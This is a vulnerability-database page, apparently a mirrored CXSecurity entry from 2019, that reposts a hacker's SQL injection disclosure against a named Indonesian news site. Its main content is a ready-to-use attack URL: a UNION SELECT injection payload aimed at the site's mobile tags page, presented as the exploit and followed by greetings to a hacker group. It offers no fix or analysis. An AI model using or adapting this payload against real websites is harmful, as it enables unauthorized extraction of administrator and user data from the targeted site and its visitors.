indonews SQLI Vulnerable - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1853937 漏洞类型
发布时间 2019-12-09 更新时间 2019-12-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019120036
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#Nick name : KHS1N Cyber 07
#Youtube     : HCT Sec07

Vulnerabilty : 
#SQL Injection

Problem
this problem if not fixed it will make it easier for hackers to take admin data or user data

domain path site & payload :
http://indonews.id/mobile/tags.php?KeyPhrase=-%20Menkopulhukam%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47--+--

HCI Indonesia, bartes dwky, lammer permanent, and for all member